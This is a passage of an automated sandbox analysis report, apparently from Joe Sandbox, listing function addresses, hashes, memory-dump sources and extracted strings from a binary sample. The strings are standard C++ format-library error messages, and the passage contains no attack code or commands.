                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                  • Opcode ID: 180d2ca3f1c66e804f871d40a534d4028a4c5551bcbd0bf3d4cafcb61f832d7f
                                                                                                                                                                                                  • Instruction ID: a4ea74996db7a793c875e173901279c040561d58ac8efdf29d48bb786b91ee9f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 180d2ca3f1c66e804f871d40a534d4028a4c5551bcbd0bf3d4cafcb61f832d7f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C61FA2AF1C282C7FB64BA388540379E691AF44F60F944235F61D46AE1EEBDEC41C720
                                                                                                                                                                                                  Function 00007FF74501EADC Relevance: .1, Instructions: 125COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 485612231-0
                                                                                                                                                                                                  • Opcode ID: 47c38df5d6474a567221756392725a8aab29c96142c372e4f07794d707facf3a
                                                                                                                                                                                                  • Instruction ID: f36568482774d775e7a017555c91019abe947d7fba3567b326b3786a1a28f7b0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47c38df5d6474a567221756392725a8aab29c96142c372e4f07794d707facf3a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A441D666B18A5481EF04EF76D954569B7A2BB48FD0B899032EE0D87B68EF3DC4528700
                                                                                                                                                                                                  Function 00007FF74502BC80 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ee9d8701c4559a96a2b78598a9406ef8228f58c35998c053563f007e2a60e84d
                                                                                                                                                                                                  • Instruction ID: ca720ee5cf736860948e4f4c8161a1bded9c885150ee7bdf786f0e9770bb5ace
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee9d8701c4559a96a2b78598a9406ef8228f58c35998c053563f007e2a60e84d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 681104B1A1C642CBF799BF38A411339B691EB05790FD4803CD84D86AA9DE3CE4A0CF10
                                                                                                                                                                                                  Function 00007FF7450145DC Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: a43eee0a0e0dafd9d44171dd9d715379e67ae08465fe1814d4149b06a77bbbb5
                                                                                                                                                                                                  • Instruction ID: 218f0b676f2c4b6afa985fa468c360d62707c505c3926afa95c059dca4e9d6df
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a43eee0a0e0dafd9d44171dd9d715379e67ae08465fe1814d4149b06a77bbbb5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49A0022D94CD0AD5E715BF60E890930E334FB54B00BC04431D10D51171AF7DE941C722
                                                                                                                                                                                                  Function 00007FF74500C870 Relevance: 35.0, APIs: 10, Strings: 10, Instructions: 48COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: Hash/sign modifier requires an arithmetic presentation type$Invalid presentation type for bool$Invalid presentation type for floating-point$Invalid presentation type for integer$Invalid presentation type for pointer$Invalid presentation type for string$Invalid presentation type for wchar_t$Invalid presentation type specifier$Invalid type specification.$Zero modifier requires an arithmetic or pointer presentation type
                                                                                                                                                                                                  • API String ID: 909987262-1539746584
                                                                                                                                                                                                  • Opcode ID: 964d25ab59281f64e11bbcd1139ce3b93a53a0ffd05dec3cf696dc095f9e5b61
                                                                                                                                                                                                  • Instruction ID: 81d9f2cb5384f3928c0aa0c8bbee6065b80e60fa6b819eb18387d659862235e7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 964d25ab59281f64e11bbcd1139ce3b93a53a0ffd05dec3cf696dc095f9e5b61
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C411DA69A1C54AD6E619F734F9992F9E760AF91F04FE21431E21D829B2EE2CF504C720
                                                                                                                                                                                                  Function 00007FF74500C8FB Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 57COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: Hash/sign modifier requires an arithmetic presentation type$Invalid presentation type for bool$Invalid presentation type for floating-point$Invalid presentation type for integer$Invalid presentation type for pointer$Invalid presentation type for string$Invalid presentation type for wchar_t$Invalid presentation type specifier$Zero modifier requires an arithmetic or pointer presentation type
                                                                                                                                                                                                  • API String ID: 909987262-2353063124
                                                                                                                                                                                                  • Opcode ID: 19a2c3cc1f45e6dfe5b2a71edc73c991534fc9ef6690a7e85d2ecf679f2f357b
                                                                                                                                                                                                  • Instruction ID: fd2b05b6d0d41458b2308ddd9917e4f26aa4dfb6e24bee7dd998ad05fca591a5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19a2c3cc1f45e6dfe5b2a71edc73c991534fc9ef6690a7e85d2ecf679f2f357b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6214D79E1D44AD9EA36F734F9992B9E690AF91F00FE50432E20D014F29E1DF944C321
                                                                                                                                                                                                  Function 00007FF74500C91B Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 55COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: Hash/sign modifier requires an arithmetic presentation type$Invalid presentation type for floating-point$Invalid presentation type for integer$Invalid presentation type for pointer$Invalid presentation type for string$Invalid presentation type for wchar_t$Invalid presentation type specifier$Zero modifier requires an arithmetic or pointer presentation type
                                                                                                                                                                                                  • API String ID: 0-1908750780
                                                                                                                                                                                                  • Opcode ID: 7670998868b1cfb22fd98583ba87f95daf6a5e8138f39bd3f72a33643366dcdc
                                                                                                                                                                                                  • Instruction ID: 544845aeafb534439c6088794cd187dce9befe4531bf3a0da9cd06265fde40ed
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7670998868b1cfb22fd98583ba87f95daf6a5e8138f39bd3f72a33643366dcdc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E116A79E1D44AD9EE36B338F9992B8E690AF91F00FE50032E20D015F29E1CF984C721
                                                                                                                                                                                                  Function 00007FF74500C938 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 52COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: Hash/sign modifier requires an arithmetic presentation type$Invalid presentation type for floating-point$Invalid presentation type for integer$Invalid presentation type for pointer$Invalid presentation type for string$Invalid presentation type specifier$Zero modifier requires an arithmetic or pointer presentation type
                                                                                                                                                                                                  • API String ID: 0-3031533609
                                                                                                                                                                                                  • Opcode ID: a6ae82777fb9e33c2b6c67835399a2f79ad1d4a790dd7c16858ad9cb1f7fe272
                                                                                                                                                                                                  • Instruction ID: 50e51142ecae0fddff8f53a8f8ce4bf55359ab7339a5b088a213ecc959ed2608
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a6ae82777fb9e33c2b6c67835399a2f79ad1d4a790dd7c16858ad9cb1f7fe272
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88111C79E1D446D5EE76B738F5992B8E690AF91F00FE50032E20D015F29E1DF984C761
                                                                                                                                                                                                  Function 00007FF74500C5B0 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 196COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: Format specifier requires numeric argument.$Format specifier requires numeric or pointer argument.$Invalid format string.$Missing precision specifier.$Number is too big$Precision not allowed for this argument type.
                                                                                                                                                                                                  • API String ID: 909987262-255851600
                                                                                                                                                                                                  • Opcode ID: fefc6c2b101d73601fd85839d3f277ca3947819604e1f5ff3019ea7ec551d7c0
                                                                                                                                                                                                  • Instruction ID: 16edb493e7bbcf9e851860f54f30c47b69a75564f177fd02f94a9c8b054bb2a7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fefc6c2b101d73601fd85839d3f277ca3947819604e1f5ff3019ea7ec551d7c0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7371A06AE0E186C5EB64BB29E1546B8E7A0FB50F80FC88032D74D077E1DB6CE5D18364
                                                                                                                                                                                                  Function 00007FF74500C955 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 47COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: Hash/sign modifier requires an arithmetic presentation type$Invalid presentation type for floating-point$Invalid presentation type for pointer$Invalid presentation type for string$Invalid presentation type specifier$Zero modifier requires an arithmetic or pointer presentation type
                                                                                                                                                                                                  • API String ID: 0-672633561
                                                                                                                                                                                                  • Opcode ID: bd92c789633ce0a064ee06438a11b82876e6326ff896c99f87e0af1d76ea06df
                                                                                                                                                                                                  • Instruction ID: 5443f9620c7380849032512833e3d2b8ff8d406f935c85c33569033332a324a3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd92c789633ce0a064ee06438a11b82876e6326ff896c99f87e0af1d76ea06df
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B1148A9E2D446D9EE76B334F5593B9E690AF92F00FE50032E20C015F29E1DF984C721
                                                                                                                                                                                                  Function 00007FF74500EE30 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 423COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~__invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFacet_RegisterXinvalid_argument
                                                                                                                                                                                                  • String ID: integral cannot be stored in wchar_t
                                                                                                                                                                                                  • API String ID: 3363080787-1689078516
                                                                                                                                                                                                  • Opcode ID: 245ea8c1471c47be9868ac7f7557a5bcca5bbc018673d067c3cf4683f4f7d1fe
                                                                                                                                                                                                  • Instruction ID: 761db4af135e7a4c6d1c8cb4acbd9c9f1d487cc3c6829076c595d6044ccc844b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 245ea8c1471c47be9868ac7f7557a5bcca5bbc018673d067c3cf4683f4f7d1fe
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5028026A1C781C5EB10FB75E4402BDB7A1EB85F94F948135EA8D13AA9DF3CE481D710
                                                                                                                                                                                                  Function 00007FF74500E5C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 123COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big$Precision not allowed for this argument type.
                                                                                                                                                                                                  • API String ID: 909987262-435359029
                                                                                                                                                                                                  • Opcode ID: e39558d1cbbba9f3a95edfad885d7de953e178870c75a2728dc50ebc8126b2a8
                                                                                                                                                                                                  • Instruction ID: 17d8e3a3a0cd0cdb02d9ed9cb9165cd57914c29ddd075d0b03bb766dad60a860
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e39558d1cbbba9f3a95edfad885d7de953e178870c75a2728dc50ebc8126b2a8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8441B23AA0C546C2DA25BB38E5502BAA3A1FF51F84FD44132E76D525F1EF2CE591C710
                                                                                                                                                                                                  Function 00007FF74500C96D Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 43COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: Hash/sign modifier requires an arithmetic presentation type$Invalid presentation type for pointer$Invalid presentation type for string$Invalid presentation type specifier$Zero modifier requires an arithmetic or pointer presentation type
                                                                                                                                                                                                  • API String ID: 909987262-3881850929
                                                                                                                                                                                                  • Opcode ID: e336c6db2436f037d43d8d38142368cd910891573940fba26cba82e07368c84d
                                                                                                                                                                                                  • Instruction ID: 2238e92dfb24874e55125948f7a548e49a55d21972223a606996f3d8bf3c0fb4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e336c6db2436f037d43d8d38142368cd910891573940fba26cba82e07368c84d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE015B6AE2D456D9EE76B734F4593B4E690AF92F00FE50036D20D015F29E1DF984C721
                                                                                                                                                                                                  Function 00007FF74500CCC0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 139COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big$}
                                                                                                                                                                                                  • API String ID: 909987262-2617750137
                                                                                                                                                                                                  • Opcode ID: a91aab9cb0516542fa6c0791161addf02aa51be5814a394f641eb71d45558398
                                                                                                                                                                                                  • Instruction ID: f47b2e56fe2db114a397b16eae495532227ac659c121ab7cebaaea54139713d4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a91aab9cb0516542fa6c0791161addf02aa51be5814a394f641eb71d45558398
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B516C2AA0D586C1DA25BB28E0511B9F360FB50F84FD44132DA5D425F5EF2CE986C760
                                                                                                                                                                                                  Function 00007FF74500C97D Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 41COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: Hash/sign modifier requires an arithmetic presentation type$Invalid presentation type for pointer$Invalid presentation type specifier$Zero modifier requires an arithmetic or pointer presentation type
                                                                                                                                                                                                  • API String ID: 0-11378995
                                                                                                                                                                                                  • Opcode ID: 310ac8017e6359a229e352d4b432ebe827916d3af7a1eeb48135549f8abafe2b
                                                                                                                                                                                                  • Instruction ID: ff1370627268b9142a775eeca94e0e10595b19e21d1962fbe36ad59db35b7614
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 310ac8017e6359a229e352d4b432ebe827916d3af7a1eeb48135549f8abafe2b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF0169AAE2E452D9FE76B238F4593B8E690AF92F00FE40032D20C015F18D1DF884C762
                                                                                                                                                                                                  Function 00007FF745016410 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                                                                                  • Opcode ID: d0cb5301bfb14595140cc0811a37ec76ac063a7b0abac73273aaf138af097b2d
                                                                                                                                                                                                  • Instruction ID: c755baec30ddd80e0aba5681a8980478afaf305e35c3d0d963c4a5c56255265a
